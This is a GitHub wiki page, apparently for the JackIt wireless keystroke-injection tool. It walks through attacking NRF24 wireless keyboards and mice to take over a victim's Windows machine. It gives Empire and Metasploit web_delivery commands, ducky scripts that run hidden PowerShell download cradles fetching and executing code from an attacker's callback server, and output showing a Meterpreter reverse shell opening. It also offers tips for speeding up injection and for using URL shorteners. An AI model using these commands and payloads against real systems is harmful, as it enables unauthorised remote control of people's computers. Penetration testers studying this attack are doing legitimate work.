phikshun edited this page Jul 16, 2016 · 6 revisions


Powershell Empire

The default ducky stager generated by Empire is not recommended. The reason for this is simple: When you use a USB rubber ducky, the assumption is that the user is not physically present. When attacking wirelessly, you may have to inject your attack when the user becomes momentarily distracted. Speed is of the essence.

The other factor to consider is whether the target device uses NRF24 radio frames that incorporate sequence numbering. All MS wireless devices use a 16-bit sequence number field. This means that if the user starts moving their mouse while you're injecting, the sequence numbers of the frames you're sending won't line up anymore. This will result in dropped keystrokes.

The default ducky stager looks something like this:

DELAY 3000
DELAY 1000
DELAY 2000
STRING powershell -W Hidden -nop -noni -enc <Base64 Payload>

First, the long initial delay is not required. The USB device is already detected, so there's no wait time to detect a new device and install drivers. Second, most machines can display the run dialog in less than 200ms. Finally, we don't really need to launch from a command prompt.

To shorten the attack, startup Empire and create a launcher. After the launcher is configured and running, create a stager:

(Empire) > usestager launcher
(Empire: stager/launcher) > set Listener 1
(Empire: stager/launcher) > set Base64 False
(Empire: stager/launcher) > set OutFile launcher.ps1
(Empire: stager/launcher) > generate

[*] Stager output written out to: launcher.ps1

The next set of commands assumes the callback machine is running Kali Linux. Move the generated file to the default web root and start the apache2 service:

root@kali:~/empire# cp launcher.ps1 /var/www/html/p
root@kali:~/empire# service apache2 start

Now your payload can leverage the initial stage via a standard PS download cradle. For example, my ducky script looks like this:

STRING powershell -W Hidden -nop -noni -c "IEX (New-Object Net.Webclient).downloadstring('')"

Be sure to substitute the URL for your callback machine. We've now cut our injection time down to less than half a second, which will make our attack much more reliable.

There are many other ways to stage in a payload. @subTee has a few examples such as this gem. Be creative. URL shorteners are your friend.

Cobalt Strike

Cobalt Strike has a feature called scripted web delivery which can be used to generate a suitable Powershell one-liner. It is documented on the Cobalt Strike site, and there's a video showing how to use it.

In the video demonstration, Raphael pastes the one-liner into the run dialog. When using JackIt, use the Empire ducky payload but swap out Powershell command with the Cobalt Strike generated one-liner.


Metasploit has a module called Web Delivery. It includes a Powershell stager similar to Empire.

To use this feature, startup msfconsole and enter the following commands:

msf > use exploit/multi/script/web_delivery 
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > set LHOST
msf exploit(web_delivery) > set LPORT 443
LPORT => 443
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(web_delivery) > set SRVHOST
msf exploit(web_delivery) > set SRVPORT 80
msf exploit(web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST      yes       The local host to listen on. This must be an address on the local machine or
   SRVPORT  80               yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST      yes       The local listener hostname
   LPORT     443              yes       The local listener port
   LURI                       no        The HTTP Path

Exploit target:

   Id  Name
   --  ----
   2   PSH

msf exploit(web_delivery) > exploit
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on
[*] Using URL:
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $W=new-object net.webclient;$W.proxy=[Net.WebRequest]::GetSystemWebProxy();$W.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $W.downloadstring('');

Use the correct IP addresses or hostnames, and the payload and callback ports of your choice. Your ducky script should look similar to the example below:

STRING powershell.exe -nop -w hidden -c $W=new-object net.webclient;$W.proxy=[Net.WebRequest]::GetSystemWebProxy();$W.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $W.downloadstring('');

Launch JackIt and perform the injection attack. You should see your payload callback and a new Meterpreter session:

msf exploit(web_delivery) > 
[*] Delivering Payload
[*] handling request from; (UUID: rlf3v2nf) Staging Native payload...
[*] Meterpreter session 1 opened ( -> at 2016-07-16 13:30:30 -0400

If you experience issues, remember the following:

  • Windows Defender will catch this by default. AV evasion is not in scope for this wiki. There are a million online references about this. Start here.
  • Don't cut and paste the example above. You will need to use your IP address and/or hostname, and the script callback URI is randomly generated so be sure to copy the payload generated by Metasploit.

Known Issues

Keyboard Layout

Some users have reported that special characters do not work correctly. This is likely caused by not using a standard US keyboard layout. We have now added a --layout option with support for several different keyboards. This option is in beta, so let us now if there are any issues.

Clone this wiki locally
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.
Press h to open a hovercard with more details.